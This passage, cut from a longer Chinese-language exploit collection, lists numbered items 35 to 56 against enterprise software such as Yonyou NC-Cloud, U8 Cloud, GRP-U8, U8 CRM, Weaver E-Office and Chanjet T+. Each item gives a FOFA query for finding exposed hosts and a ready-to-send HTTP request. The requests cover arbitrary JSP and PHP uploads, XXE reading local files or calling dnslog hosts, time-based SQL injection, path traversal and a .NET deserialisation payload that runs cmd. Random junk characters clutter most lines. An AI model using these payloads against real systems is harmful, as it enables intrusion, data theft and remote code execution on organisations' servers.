35. 用友NC-Cloud importhttpscer任意文件上传7 c. ]2 P( Z* J! V
FOFA:app="用友-NC-Cloud"5 v9 ~$ n4 Z: y4 T
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
% O+ m3 X3 Z7 p' M( k n% UHost: 203.25.218.166:8888
, O" N1 y. I* j* [6 d: C2 ^5 iUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
3 i( ]; K& I P5 k2 e# RAccept-Encoding: gzip, deflate
7 O2 O% ^! x1 {. `Accept: */*7 _, b1 s- A) y6 s2 G
Connection: close
7 w/ m! L) l4 `" ^5 MaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA, n8 `# u1 O9 A5 a
Content-Length: 190, _2 c" f6 ~) c& V6 A$ Q
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
4 n: G/ M* ~$ D5 X' n
6 Y9 |1 c# f& P( L3 u9 P( E" _--fd28cb44e829ed1c197ec3bc71748df0
3 @; y) V" S2 Q& v% o6 fContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
7 r4 @* p9 n; w# c
W* M% U! s9 ?# y1 P<%out.println(1111*1111);%>
0 r0 y& r; I8 J--fd28cb44e829ed1c197ec3bc71748df0--
! H9 B. \7 ?/ H) Y, o) j8 x8 L5 X W: T6 O2 Q
2 R- X9 v" Y8 X( L
36. 用友NC-Cloud soapFormat XXE
* x, r/ b7 i: x% EFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"8 E1 D N" _0 F4 L+ V( V8 c
POST /uapws/soapFormat.ajax HTTP/1.18 R, o5 M! r) T$ L2 o! I
Host: 192.168.40.130:89898 F0 k8 S) r" \( Y* V! A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
0 I5 u1 @! Q% d6 l6 E1 N- l+ ?$ RContent-Length: 263- u9 E, z/ ~0 ]5 U0 c" [3 n# l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& ]' q6 H g: u; t5 L, e
Accept-Encoding: gzip, deflate2 T4 j. |. G2 E9 \- w9 [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 }! c( Y" r% ?Connection: close5 I, s8 A) v4 _; @8 `$ w
Content-Type: application/x-www-form-urlencoded
, S3 A/ l2 v7 e% L! }4 \Upgrade-Insecure-Requests: 17 |" k8 r m# d2 x# G% ?
% g9 X* d2 S& r, ^
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a/ f" S0 f& h E' H* L
/ m* ]: ~$ h, o9 H% m; ^' W# L# d$ v. r9 L9 a7 l* d; r
37. 用友NC-Cloud IUpdateService XXE. @, {" T( ~$ ]
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"( c8 }2 Z# K: \' y' X A
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
7 Y/ k# S; |3 |( k, MHost: 192.168.40.130:8989
! g, ]( b. ^) I) h) PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36% |' Z" c- l) w
Content-Length: 421
9 D+ S( f: c0 ?$ N2 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' B, q/ U; T& W( M" g. l$ K2 Q
Accept-Encoding: gzip, deflate* Z; |) [* o6 i% o# |
Accept-Language: zh-CN,zh;q=0.9
1 F; I3 W: u a+ ?' n) tConnection: close
! E3 u1 d; e4 i+ p- G" GContent-Type: text/xml;charset=UTF-8
3 [1 A3 O/ {; |1 j/ r# N2 \- fSOAPAction: urn:getResult& w6 }' K1 A0 }" c
Upgrade-Insecure-Requests: 1
& ]! T T9 v' w' \2 W& }5 l( P# b) ]/ @& E, i) Z0 a1 s5 P5 k& t
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">& c6 l0 o) |0 g5 x
<soapenv:Header/>( r! n4 |0 |& F: d; J" L# k+ H
<soapenv:Body>
& ]: o- r$ T! w: q<iup:getResult>9 P' X7 ]* u7 _1 g% V
<!--type: string-->
" J$ A0 i+ ~3 ]<iup:string><![CDATA[
! A+ F& f) |( O- h$ ]/ r" T* w) V<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
" z+ o! k$ t+ [* r2 W<xxx/>]]></iup:string>
7 L$ N& {, n I* w8 l# |" J</iup:getResult>
# l& D( q+ \ u1 [5 m' w</soapenv:Body>
, X `5 k# U. U8 Z% ?- {0 @* j</soapenv:Envelope>
- q" x: a9 n1 ?! U3 G" w- Z& L# Q+ w% t" k7 L& \
2 `2 g. R/ ^" m' Y) T7 v" I$ i% v
% Y" O/ R0 m3 F& O+ d
38. 用友U8 Cloud smartweb2.RPC.d XXE3 E4 g9 f) q5 H3 ] [: o# j
FOFA:app="用友-U8-Cloud"
7 h h k3 G3 [2 nPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
* i* f& T- Y# y a. ZHost: 192.168.40.131:8088' u$ E! T2 ~# T: d! J3 D- X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
/ R- k; k3 D$ w4 i2 O/ uContent-Length: 260
: s' V- y8 w' W' m4 sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b30 L1 m9 C6 _% K8 w4 g
Accept-Encoding: gzip, deflate
* p1 U6 M8 D: T$ A, {Accept-Language: zh-CN,zh;q=0.9
+ e7 s- i7 q9 y; F) t5 cConnection: close
2 s5 C+ q+ A0 Q. GContent-Type: application/x-www-form-urlencoded
& u5 ?& o4 n6 o3 Z# V2 H$ f, i' b1 I7 i8 @$ M
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
. K# F% M; U" q" l' J; b+ \5 s) v" s# C+ M8 R4 s. D
$ Z8 u& i* M& P8 y4 z2 ?4 G; ]39. 用友U8 Cloud RegisterServlet SQL注入
+ B$ c, y3 h& ?2 Z5 C5 FFOFA:title="u8c"
* s5 ?5 T q: p) g' @( j4 i1 SPOST /servlet/RegisterServlet HTTP/1.1 U0 V4 O! Z0 g1 I" p1 V1 v
Host: 192.168.86.128:8089
( m x4 w6 _9 j, c- c VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
* z1 B5 ^2 ~& N& V" EConnection: close' E$ ^( T$ K! v0 @; F8 D Y7 Z
Content-Length: 85
! A# j' j: Z* `' g, i, R2 TAccept: */*
2 H6 [" y) x l# c& N/ `/ OAccept-Language: en
: o% U( L3 [0 ~Content-Type: application/x-www-form-urlencoded7 V3 q7 g8 S5 Z) Q
X-Forwarded-For: 127.0.0.1; X7 g% a0 |% i& h D! c+ r1 O/ M& V
Accept-Encoding: gzip
: m7 j% h: N) {0 X
9 c/ |% H7 @1 Qusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
1 Q' s. Z: S( ]$ I& h: W, n) r* e& x+ [0 a0 r) `
4 U) z/ P5 f4 Y0 H9 D, c- Y% P
40. 用友U8-Cloud XChangeServlet XXE2 c# V6 k: X* O
FOFA:app="用友-U8-Cloud"
; x/ S7 `8 K. M# x M+ DPOST /service/XChangeServlet HTTP/1.1% _- {4 J" e' W' |
Host: x.x.x.x' _" |; Q% B9 `) R) H- z! b
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
; S( a& j; i/ V4 v6 K* [Content-Type: text/xml8 U' L Q: a# Y) ~9 r' y4 L
Connection: close4 b8 n* }( H; r
& K9 l& R2 X) Q* a( `9 {: I% V' F2 {
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>1 C# n C8 D% m! \, F8 J
% {3 W: f; i$ V3 d$ n* D$ o
4 A. o: w5 |7 E9 P! o% M& a- b; X& C
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入6 g( S1 ^7 b8 d
FOFA:app="用友-U8-Cloud"* y, V( A% y8 i1 ]& c: F7 }
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1+ ]' c: a- X' A
Host:
0 A( c0 ?% r; s1 }+ WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ e( |4 R$ g4 ^( J; Y9 yContent-Type: application/json2 m, [. s& K( o
Accept-Encoding: gzip
( R2 G3 T* H5 O6 o, o: QConnection: close
) u# f9 W( ]' q4 E
) O( q" r. e: x1 h5 d4 f1 z4 G5 j& r. z2 W. N: A# r0 F
42. 用友GRP-U8 SmartUpload01 文件上传9 p1 e$ I) U6 A& F$ ]6 }
FOFA:app="用友-GRP-U8"5 \5 Q: b8 E7 \7 ?# B
POST /u8qx/SmartUpload01.jsp HTTP/1.1# F1 P& A" U2 q) _ m/ G+ h
Host: x.x.x.x3 ^2 F+ V0 K+ S8 [/ C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt2 s; Q w; t0 B$ s( T8 q- {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36: k. v0 }3 u8 [5 F/ |8 Z
/ h& N) L/ ?2 j3 E4 M1 G, A
PAYLOAD
9 E0 c3 T8 P7 p7 ?( i6 t# L- ^8 I+ i6 K1 h! o& I; w+ u" H. C
' P, t/ ?2 {; w5 h. o! ~http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml3 `; n7 E: W2 I% w
- Z& r( c2 z& N5 j43. 用友GRP-U8 userInfoWeb SQL注入致RCE, `( X$ x' Q% X+ N% v
FOFA:app="用友-GRP-U8" f( j. }8 e3 M! R
POST /services/userInfoWeb HTTP/1.1
% J: X$ e$ ?) u$ b( z$ @- IHost: your-ip
0 l+ f! k w- b& s* Z: i+ ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
: h. c9 e9 W- Z+ c- I# |( YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ R& `* F& @$ R X4 U
Accept-Encoding: gzip, deflate {# i6 l2 [% w) o
Accept-Language: zh-CN,zh;q=0.9
& [' T4 m6 \& q: C, XConnection: close
+ K0 `; f! `8 h/ B( }SOAPAction:
& s0 Y' C/ F( e2 i cContent-Type: text/xml;charset=UTF-8
x; q6 g* V6 B6 w/ x* @8 Z& v7 d8 C
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
* V. V; h6 Y2 K: S4 z5 O( f <soapenv:Header/>
, k7 ?2 I* y9 @7 l <soapenv:Body>
$ l+ Z3 v0 ~$ l. l <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">- j5 W% _; A0 Z, A5 r0 g
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>$ R) ` C( j! M E1 S! b* [' y0 r
</ser:getUserNameById>
; D1 B6 U; [- S </soapenv:Body>" M# R0 w( `9 q# ^8 e7 V" }
</soapenv:Envelope>
0 r* o) k- v! \2 _2 R! b: j# p# @% _0 _9 G4 o
/ e4 w4 ?5 Q5 p3 i/ }6 J8 H! T% h44. 用友GRP-U8 bx_dj_check.jsp SQL注入& j' p' V% [( H# i( T% t: i* J
FOFA:app="用友-GRP-U8"5 k! l, n g x1 v
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.15 B1 T$ x) d& O; n: C7 e
Host: your-ip( W( {# u: ?# w/ p+ F4 S: d' {/ _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
3 n ?4 Y9 o& r3 ]: _1 n. K! BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 P( h5 U y6 Y( `/ t3 b
Accept-Encoding: gzip, deflate$ X/ v% y- l' ~+ T$ ?
Accept-Language: zh-CN,zh;q=0.9' R: _, k, s1 h8 V
Connection: close
) r! L3 v7 h [1 P% i' S9 \5 l5 ?8 t( m- F' l* P% X0 ]' K$ T! g
$ h7 A& v+ b5 l45. 用友GRP-U8 ufgovbank XXE
( y2 z0 m- X# J6 m' n w5 SFOFA:app="用友-GRP-U8"
- G d) M+ o0 F4 R( M4 tPOST /ufgovbank HTTP/1.19 s6 _ T7 z0 o
Host: 192.168.40.130:222
0 B) U; D1 I k5 T7 x/ xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0- I! g7 d8 M2 Q3 }
Connection: close z' S; W) k, l' g# ?- [! O" f J
Content-Length: 161
& L$ J+ ] ?- D3 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. {* ~5 \4 ]; @, p' }# [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% [# M3 e- k7 dContent-Type: application/x-www-form-urlencoded
" n. u, `& q9 U* k$ o5 OAccept-Encoding: gzip. x+ \1 y+ ^: H) _6 Q8 w* F, e
+ h& Q& P1 l7 N9 p/ z1 H1 g1 g
reqData=<?xml version="1.0"?>
- W0 \$ d* V; d3 [+ s<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest% \# w, O: u7 z8 O1 i: k+ ]+ L
6 W% C. {& Z( I& K X& r4 @1 Q/ t+ N# V) q/ X
46. 用友GRP-U8 sqcxIndex.jsp SQL注入+ Z. [' E6 J% {/ D/ |& c
FOFA:app="用友-GRP-U8"5 ^9 g9 N" x2 t$ m0 i
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1, k5 l ?; G5 q+ A9 A
Host: your-ip4 z8 B n4 D- `" P# _1 |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
I. P' f) E/ S1 l) E. \" rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. V8 k! a0 x- K7 h# V: q
Accept-Encoding: gzip, deflate, r+ X& ~( k( \' i) p) x# f" v# q
Accept-Language: zh-CN,zh;q=0.9
( P8 q0 T1 Q7 _( `# [' _ h5 X! cConnection: close$ H O! [' h \. ~( N
4 V- {1 i9 o5 m3 o6 n" T/ W }! o( F) }9 K
47. 用友GRP A++Cloud 政府财务云 任意文件读取
* W0 u2 D# b$ ^4 P8 GFOFA:body="/pf/portal/login/css/fonts/style.css"
1 W/ T' F s$ _) u0 s" W6 jGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1& y# [% D7 H) X# u- n' _9 k2 z
Host: x.x.x.x' Z! t. _/ Y6 }6 X$ P
Cache-Control: max-age=0
# J& D: q" h- W! fUpgrade-Insecure-Requests: 19 m- R- T4 F. y4 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
# p; R9 G1 [1 m+ _; O, S: HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% M a% g* B/ o# I0 r4 s" D/ C
Accept-Encoding: gzip, deflate, br5 V; }+ ]# P1 y0 \) q
Accept-Language: zh-CN,zh;q=0.9
0 A/ g( P9 u8 @3 z) `/ }If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
; Y. E: T6 z: Z$ AConnection: close
5 h* H/ r7 r+ [& L' h. ]- i( D4 U' ^6 c) r0 p# z4 @! S
7 L w( D) q Z b5 F5 S
, r1 W! }0 W4 H5 p! b# l, ~, U48. 用友U8 CRM swfupload 任意文件上传
' ~ o+ s. R: I- Q. Z# \- O+ GFOFA:title="用友U8CRM"
1 ^$ ?! a' a4 G' p, m; K" xPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
) l( g& p# e2 K! v5 O! rHost: your-ip, b- a, ]4 U$ ^ M. A3 `0 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.07 t' A. V* i \' Q ~% q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' s9 u5 D, {7 w7 l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 }, N+ o+ W. z; K1 T- T4 R. n4 d- GAccept-Encoding: gzip, deflate
# r! i, C5 a7 ^2 }/ \Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
: W+ H9 w" a% f; Q------2695209672394068716424300668553 E- _5 e. h0 Q' S7 }/ X1 f( C' {1 P0 F
Content-Disposition: form-data; name="file"; filename="s.php"
( v5 h% `% ~8 o0 o. k S1231# \+ F" K# m6 h2 I+ u
Content-Type: application/octet-stream
. H. O/ V! G' F------269520967239406871642430066855
1 n) t6 s) C0 yContent-Disposition: form-data; name="upload"
/ l: y C3 P; r+ s |, {. Dupload
3 O: m$ b8 E$ i1 X5 ?------269520967239406871642430066855--8 D2 H7 `8 \9 i3 P; r! C2 q+ N) Y9 R
1 @% F' u% I9 Q! [$ L
+ M0 b6 |1 @4 U+ s. r49. 用友U8 CRM系统uploadfile.php接口任意文件上传3 L6 D. [2 {/ i' `4 L+ p
FOFA:body="用友U8CRM"/ d0 }. T; d+ v0 z7 d$ q
; a* ?3 G% S: s7 u# oPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
& [1 Y, M4 o! |8 gHost: x.x.x.x+ z2 r3 U4 b! y V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: `3 e9 u# J8 \; x) ^
Content-Length: 329
/ e, v* i$ A' p* k1 @" F9 i6 @+ b# ]3 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 M+ `! k. ]! b+ S! ]
Accept-Encoding: gzip, deflate
V! l E! W1 m& D8 T: AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: h6 {( n) J( K0 b# e5 EConnection: close1 P6 O/ ?5 M7 \ j% N5 r9 m5 N
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w' H: j, Z7 J% o* [% D
7 C) _3 W7 |) r$ ^/ I8 r-----------------------------vvv3wdayqv3yppdxvn3w( e" k- K& T# d2 Y+ n( U
Content-Disposition: form-data; name="file"; filename="%s.php "/ ~& g/ O: F G1 R
Content-Type: application/octet-stream
2 S$ R7 v$ H# l6 \& F7 D- \: |6 ~+ @% Q& ?
wersqqmlumloqa
5 {* x1 M5 J& ]* r4 _ B. E8 l4 v-----------------------------vvv3wdayqv3yppdxvn3w0 _6 G7 r6 V- a6 x9 y
Content-Disposition: form-data; name="upload"8 w9 P3 S) {. B; R0 S6 i
- Q1 H4 f7 O: H+ u: O/ p) _8 h
upload2 ?* O0 t: D+ M% [' I
-----------------------------vvv3wdayqv3yppdxvn3w--
# E7 Y$ B: c. Y& j5 I! u0 o f) q h
: K3 |+ ^9 Z" z, d4 S6 k0 P8 r: r& t. n% y6 G. D
http://x.x.x.x/tmpfile/updB3CB.tmp.php
% b! b8 W7 M! o6 {( |; B4 l
$ i3 Z' U) f- L* ^2 k. G; N50. QDocs Smart School 6.4.1 filterRecords SQL注入
; @/ T% j+ G9 G ^6 MFOFA:body="close closebtnmodal"
, C5 Z* }' m; U! B, i& v7 ~POST /course/filterRecords/ HTTP/1.15 m' W% u; Y, u; ?
Host: x.x.x.x
' U* v* k9 T! c; QUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.360 |! Y7 c6 ^( z) L) H$ q3 t! e
Connection: close# i5 Q: ^4 C' f: ^
Content-Length: 224. A( s! {+ _% }' c" J; @
Accept: */*$ m6 |: _# s0 ]3 D S6 G5 b0 G- s
Accept-Language: en
/ R- U" H: D- I. uContent-Type: application/x-www-form-urlencoded6 |7 A+ \; P1 U$ }& w5 D; u. d/ E
Accept-Encoding: gzip/ `; d9 g$ w: J1 H
) h1 k7 l" [' s7 K, j* o/ K* osearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1- R/ H' T! i! w
3 K% U) o! e2 Y2 N' K$ ]( R/ m0 o- G& n3 G0 J
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入, B; L# |6 u* v) {) w" }6 Q
FOFA:app="云时空社会化商业ERP系统"/ Y; B" o% E8 P* M8 _
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
. X: D- _- q; zHost: your-ip
0 v; s0 j! W5 U' R8 `6 C: V$ RUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36* x- L$ W& X. u% c3 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
* x. B4 T; a. V n; I* t6 C+ LAccept-Encoding: gzip, deflate
: U/ f0 X- @% h* h3 E% f qAccept-Language: zh-CN,zh;q=0.9
. C' l) \) b5 ? N3 U5 ~( s: l- KConnection: close
5 ] l+ G9 S6 k* c3 F% }. l" Z6 Y1 U9 l( d/ E
2 R+ @4 j8 u$ q8 Z' O3 v52. 泛微E-Office json_common.php sql注入/ n5 \! ^' {7 {* l
FOFA:app="泛微-EOffice"
3 j1 z9 U3 t+ E0 t- ^( ?POST /building/json_common.php HTTP/1.1
. T# y6 ]) W' E9 I# B2 d$ DHost: 192.168.86.128:80970 H8 r! p+ ~6 \
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ B, P8 Z. @- }( R$ e: ^
Connection: close. w& S+ b6 j& F8 `; z% U
Content-Length: 87 w1 _( E6 a+ j1 [+ E$ u% s; Q
Accept: */*
/ ], O' \+ X- ], R, CAccept-Language: en
4 p& k- P3 a) J2 P; `Content-Type: application/x-www-form-urlencoded
/ n* e0 w. D4 cAccept-Encoding: gzip3 _: z5 ?& Z. E! ?( Q: S. Y
: ?9 c3 x6 o" |& _9 ?! d' c
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3337 ?+ I7 I: |- _: R8 f
, E% `6 r" l5 O' }
) h& D7 a6 u2 t7 a+ i' z53. 迪普 DPTech VPN Service 任意文件上传
5 r( t) I' C: l, _8 l4 u8 JFOFA:app="DPtech-SSLVPN"& m/ Q( [6 S6 S' A. d2 I
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd) F }. W9 J0 o* Q
+ c, T+ f6 i! N* }! F& T B5 A, G `
: S- z* Z' {5 w2 U5 O54. 畅捷通T+ getstorewarehousebystore 远程代码执行
) b: U8 M# f, _FOFA:app="畅捷通-TPlus"
$ K" `1 T3 ~! @; q$ R第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件3 e! `* ~2 n+ F1 x7 M
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"8 _$ M. T& H( B# T
3 i! D' j! o, a, c# J' M+ z* u# ?6 f3 ^" P: k3 A) n U
完整数据包6 ]# d0 K7 g0 `; k! X9 w
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
& _9 F/ t$ m' p+ Z* Z2 I# oHost: x.x.x.x
4 a( v F: X0 h. G' n; f5 uUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
# l! O6 q- |8 n4 J$ ~- d( e3 d/ CContent-Length: 5932 U! ?# d; M; q
/ N5 B0 G6 Q O. l; U9 V{
7 n/ K' x& ^( D8 B5 }% r" B( F"storeID":{
% B: C9 O7 ?. j! @! w0 ^; s "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",: o( f# q2 e8 T: @% ^1 B# a9 Q) {2 i
"MethodName":"Start",
$ W4 A$ L4 Z4 n( Y7 j "ObjectInstance":{
1 t d! y' x& ~- O1 K9 V "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",' V. n7 X9 W' q) |1 {! b+ t
"StartInfo":{ V7 p- N4 _& `% J i
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",( U9 m4 ~5 O& o7 [* z
"FileName":"cmd",
2 }! `( m8 G' R' D/ O9 G9 Z "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"% f7 a. s R; P# E
}4 r% t; O7 j* E! _* F: [+ N
}
" }& s1 Y+ D0 N7 L }. C* h' G8 [# x' h
}
+ {. Z7 ]& V% l' X+ y$ \5 C5 z
! d% {; Z( a$ E/ Y& |; y, n: g* Y$ P" s
第二步,访问如下url
6 ?6 R$ q0 V' T% }, E/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt K" z9 k$ U& @7 S: R' X
9 ^. C9 w" `8 S3 `, i/ ?9 P$ p
C {. d& ^2 ^4 ?2 k) b
55. 畅捷通T+ getdecallusers信息泄露& _5 N0 F! o; \
FOFA:app="畅捷通-TPlus"
$ T6 _0 w8 J) K3 d3 {' ?/ |$ B第一步,通过
1 V' a% I+ l; g2 H R/ h/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie) R: V, P. w* z3 V( |/ T- {, G
第二步,利用获取到的Cookie请求/ s; E9 d1 b. m9 r
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers6 a P" z4 l0 |
. R$ d1 l7 i5 J) g$ h56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE- S" b2 a) w4 w9 @6 Z+ c" N7 D
FOFA: app="畅捷通-TPlus"! w6 s# U9 @. p7 O) h
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
